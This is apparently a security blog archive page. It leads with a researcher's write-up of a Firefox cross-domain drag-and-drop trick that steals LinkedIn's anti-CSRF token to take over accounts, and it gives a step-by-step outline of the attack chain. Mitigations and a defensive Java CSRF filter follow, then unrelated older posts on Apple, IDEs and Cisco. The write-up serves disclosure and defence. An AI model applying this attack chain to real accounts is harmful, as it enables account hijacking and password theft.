        The main problem with my exploit development, during the penetration test, was that the drag&drop method had recently been killed by Mozilla. An interesting answer to the Mozilla fix is the fake CAPTCHA method introduced by Krzysztof Kotowicz - and demonstrated to be effective against Facebook and Google eBookstore - but I chose the hard way and tried to bring the drag&drop method back to the masses: so please welcome the iframe-to-iframe cross-domain extraction method.

        The iframe-to-iframe extraction method


        The extraction method is extremely simple: instead of performing a drag&drop action of sensitive data from a framed vulnerable web page to the framing one (attacker-controlled), the victim is tricked into visiting a malicious HTML page that includes two iframes: the vulnerable page - where the sensitive content resides - and another attacker's page that is used to drop the extracted content (Figure 1). Firefox is not able to block this kind of attack because no check on cross-domain drag&drop between iframes is performed. As mentioned before, the method was tested against Mozilla Firefox version 17.0.1 - the latest stable release at the time of writing. The iframe-to-iframe technique was also tested against Google Chrome, but that browser proved robust against the proposed attack.
        Figure 1 - iframe-to-iframe d&d extraction method.
        The iframe-to-iframe method re-introduces the possibility of abusing the Firefox drag&drop mechanism to perform cross-domain data extraction. Let me now introduce a high-profile vulnerability and attack that targets the LinkedIn application, implementing the proposed method.

        All your LinkedIn accounts are belong to us


        LinkedIn implements a stateless anti-CSRF mechanism that associates tokens with the HTTP requests that result in a change of the remote application state, such as the update of a user's profile information (e.g. the job title or the login e-mail address). A stateless anti-CSRF method is generally based on a secret token, delivered as a cookie parameter, and a token included in every state-changing HTTP request: the remote web application considers genuine exclusively those HTTP requests that have the same token value for both the cookie and the HTTP parameter. Otherwise, a request is considered untrusted and is not processed. LinkedIn's anti-CSRF mechanism involves a cookie parameter called JSESSIONID and an HTTP parameter named csrfToken to store the secret tokens (Figure 2). A stateless mechanism like this can be easily bypassed with well-known web hacking techniques.
        Figure 2 - anti-CSRF tokens.
        For example, the attacker could abuse a Cross-Site Scripting issue on www.linkedin.com or any LinkedIn subdomain to poison the cookie parameter JSESSIONID and bypass the mechanism - this attack is also known as Cookie Tossing. During my security research I found a vulnerable LinkedIn page that includes the anti-CSRF token within the HTML code, despite not being protected by the X-Frame-Options header. Under these circumstances, the iframe-to-iframe method can be used to attack authenticated LinkedIn users and steal their secret token in order to perform different kinds of malicious actions on the victim's profile. The following URL refers to the vulnerable LinkedIn web resource, as detailed in Figure 3:

        Figure 3 - Vulnerable LinkedIn web resource.
        The vulnerability can easily be abused to craft a UI Redressing exploit that tricks the victim into dragging and dropping the anti-CSRF token. The token can then be abused to edit any information on the victim's profile and even to reset the account password. In order to demonstrate the effectiveness of the attack, I developed a fully working Proof of Concept exploit that adds the attacker's e-mail as a trusted address to the victim's profile and verifies the e-mail itself. At that point, the attacker can easily reset the victim's password using the LinkedIn password reset mechanism.

        The following are the logical steps implemented by the Proof of Concept exploit:
        1. The malicious page frames both the LinkedIn vulnerable page and the attacker-controlled "dropper" page;
        2. The malicious page allows the victim to play the d&d game, which extracts the anti-CSRF token;
        3. The malicious page can now bypass the anti-CSRF protection and add a new e-mail address to the victim's profile. The action involves the forwarding of a confirmation e-mail from the LinkedIn system to the attacker's box: an activation URL is included;
        4. The exploit interacts with an attacker's script - /linkedin/linkedin.php - which accesses the attacker's mailbox via IMAP and waits for the LinkedIn activation e-mail. Once the e-mail is obtained, the URL is returned to the malicious page, which is still loaded in the victim's web browser;
        5. The script can now simulate the navigation of the fetched URL in order to confirm the new address.
        The attacker can now reset the victim's account password by abusing the password reset functionality, where he will type the e-mail address previously added to the targeted profile. Figure 4 highlights the different HTTP requests exchanged between the attacked web browser, the attacker's servers and the LinkedIn web application in order to achieve the password reset.
        Figure 4 - Sequence diagram detailing the attack.
        A working PoC has been developed and can be downloaded here. The following is a video of the attack:


         

        Beyond the Mayhem


        The LinkedIn Team was informed about this attack scenario. The following are a series of suggestions that should prevent this kind of attack:
        • Protect every web resource that includes anti-CSRF tokens with the X-Frame-Options header. Nowadays, this mechanism is available in all major browsers;
        • Consider adopting a stateful anti-CSRF mechanism that does not perform validation on the basis of potentially attacker-controlled inputs; a minimal sketch follows.
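
        Regarding the second suggestion, the following is a minimal sketch of a stateful check (names are illustrative, not LinkedIn's implementation): the expected token lives in the server-side session rather than in a cookie, so Cookie Tossing from a subdomain cannot influence the comparison. The filter also stamps X-Frame-Options on every response, per the first suggestion.

        import java.io.IOException;
        import javax.servlet.*;
        import javax.servlet.http.*;

        public class CsrfFilter implements Filter {
            @Override
            public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
                    throws IOException, ServletException {
                HttpServletRequest request = (HttpServletRequest) req;
                HttpServletResponse response = (HttpServletResponse) res;

                // deny framing of every resource that carries anti-CSRF tokens
                response.setHeader("X-Frame-Options", "DENY");

                // compare against a server-side value, never a cookie value
                HttpSession session = request.getSession(false);
                String expected = (session != null) ? (String) session.getAttribute("csrfToken") : null;
                String received = request.getParameter("csrfToken");

                if (expected == null || !expected.equals(received)) {
                    response.sendError(HttpServletResponse.SC_FORBIDDEN);
                    return; // reject requests with a missing or wrong token
                }
                chain.doFilter(req, res);
            }

            @Override public void init(FilterConfig filterConfig) {}
            @Override public void destroy() {}
        }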

        July 25 2012

        22:54

        Discontinued

        After 2 years, I'm convinced I will not get back to posting on this blog. Accordingly, Oversighting is now officially discontinued. I'm leaving the articles online as they might be useful to someone in the future, but I won't post any more updates.
        22:51

        Can we eat the apple?

        As IT professionals, we are used to love-hate relationships. We invented Perl and LISP, so we know what we're talking about. But it seems Apple is a white cow in a black herd.
        In a recent article on his blog (later picked up by Ars Technica), Vladimir Vukicevic revealed that he had found undocumented APIs in Apple's frameworks.
        While I don't think this is malicious behaviour in itself, think for a moment about Microsoft doing the same thing, and the reactions that would follow.
        Instead, the thing went almost unnoticed.
        It's hard to hate Apple, or even to be angry with that company: Apple is innovating every day, doing amazing research, and is cool whereas Microsoft is not. And I did not mention the iPhone, the iPod and so on.
        But then, Apple is cheating: not releasing SDKs and in general acting like it couldn't care less about fair play and the community.
        How long before we realize?
        22:51

        How to use google analytics on soup.io

        I'm running a soup blog for personal entertainment: soup.io is a great service for fast, quick blogging and has a great team, but it's missing statistics.
        So, I've used Google Analytics. Here's how:

        • Create a Google Analytics account

        • Copy the tracking javascript (new version)

        • Edit your soup description

        • Enter html mode

        • Paste the javascript code inside the description, then save.


        Here you are: Google Analytics up and running.
        I think you should not edit the description again, but I'm not sure.
        22:51

        Web 2.0 IDEs

        How should we develop for Web 2.0? That's an interesting question: as of today we lack methodologies, testing tools and a proper development environment for the web. That is, if you see through the smoke: while any C developer can start coding and debugging in less than an hour from a clean system, most PHP developers are still stuck with echo and similar "debug stuff" from the 70s. If you look at Java, things get only slightly better: while you can have debugging for some parts of the code, the ecosystem around J2EE is so crowded it's almost impossible to have proper methodologies.
        But the real nightmare is the frontend. I know CSS/JS gurus coding with Emacs! While Emacs is a very nice operating system, it's unbelievable there's nothing better out there.
        The idea for this post came from the recently announced release of the new version of WaveMaker visual studio, a "drag and drop" IDE for Ajax-powered websites.
        The arena of Web 2.0 IDEs is full of competitors. Mind you, I will only name a few, but feel free to drop me a comment if you know some more. I will do a little mixing between Ajax/client-oriented IDEs and IDEs supporting server-side languages, but that's exactly the point: in the new Web 2.0 we need to use both! What's more, most IDEs are not just IDEs: they support their own frameworks with proprietary libraries, different standards and so on.

        • Aptana is one of the best IDEs around, featuring an Ajax-powered web server and supporting AIR too (AIR vs Silverlight, anyone?). Aptana targets PHP and RoR, two of the most popular languages on the internet, but... surprise, no support for PHP debugging, only Javascript. So even with the advanced Aptana you're cast back to the stone age of echo $debug

        • Echo2 is a framework/IDE aimed at Ajax and rich-client development. It's obviously Java-based, and provides a nice and easy environment for the developer. I can't help but feel a "black box" look around Echo-based applications.

        • qooxdoo is a complete framework for Ajax: it does not require any knowledge of HTML, CSS or whatever, being a huge juggernaut with its own libraries and a development environment completely masking the underlying structure. Server side, it supports PHP, Perl and Java. Did I mention there's no debugging?

        • Morfik WebOS AppsBuilder is another complete framework for Ajax, featuring a visual environment for page building and browser-side debugging via FireBug. And when I say complete I mean it: Morfik is a complete RAD tool, so you are either going to love it or hate it.

        • The Eclipse PDT project is an Eclipse plugin powering the development of PHP code. It's still not very mature, but will eventually support complete debugging (it actually does by now, but it's a little tricky to set up) and it's my IDE of choice, by the way.

        • RDT is a complete Eclipse plugin for Ruby on Rails development. Nothing to say here; it's probably the IDE of choice of most Ruby developers.

        • Zend Studio should be a bigger player. It's Eclipse-based now, supporting unit testing (finally!) and proper debugging. But still, its relatively high price is a huge stop for buyers: most PHP guys nowadays were coding alone yesterday and could not afford Studio. The result is that they don't need it now, and they probably won't tomorrow. Bad move, Zend.

        • Netbeans has surprisingly good support for Ruby on Rails, including debugging, semantic analysis and so on.

        • 4D's Ajax support is a nice addition to the 4D suite. I must admit I never quite got to know 4D, it being a little too "closed-minded" for me, so I'm just mentioning it here.


        But wait: how come we are speaking about Web 2.0 IDEs without mentioning any IDE that is actually 2.0? Well, here you are:
        • Heroku is a feature-rich, powerful and scalable IDE for developing Ruby on Rails applications directly on the web. Heroku will take care of everything, from giving you an IDE to actually running the applications in production. That's a tremendous improvement, but still... you will be missing the most advanced features of a full IDE (debugging, call tracking and so on).

        • AppJet is a full-Javascript solution: write your Javascript code in their IDE and voila, it's up and running server-side.


        Conclusions: while we have dozens of players and products, not only are we missing the ultimate IDE, but most environments don't even support the most fundamental features that programmers have become accustomed to.
        Debugging, proper testing and continuous integration are nowhere to be found in the brave new web.
        The next time your favourite web application goes mad, you know why.

        Update: after a quick test, I've added 4D and Netbeans. Thanks go to freakface and Mickael (even if he is now using gedit).
        22:51

        Cisco and KVM

        Virtualization.info published breaking news yesterday: Cisco will use KVM on its brand new ASR 1000 router.
        KVM is a virtualization technology included in modern Linux kernels: it is the virtualization platform supported by Ubuntu, ready to replace Xen in most open-source environments as soon as it reaches enough stability and usability (and possibly gets a user interface).
        The ASR 1000 is Cisco's highest-end router, costing around 35k US$, and it's the first Cisco router using Linux instead of the proprietary IOS. The ASR 1000 will leverage KVM to provide operating system redundancy without any dedicated hardware.
        While Cisco has invested in VMware in the past, and they are collaborating on the VFrame technology, the message is clear: there's no space for VMware anymore in embedded, low-footprint virtualization. The ability to fine-tune the operating system to its maximum and the source code availability of KVM offer unmatched advantages in such challenging, high-performance environments as routers and embedded devices.
        We can easily expect to see more and more virtualization embedded in appliances and hardware devices: what about an antivirus box able to trace the stack of malware by running it in a virtual machine, instead of the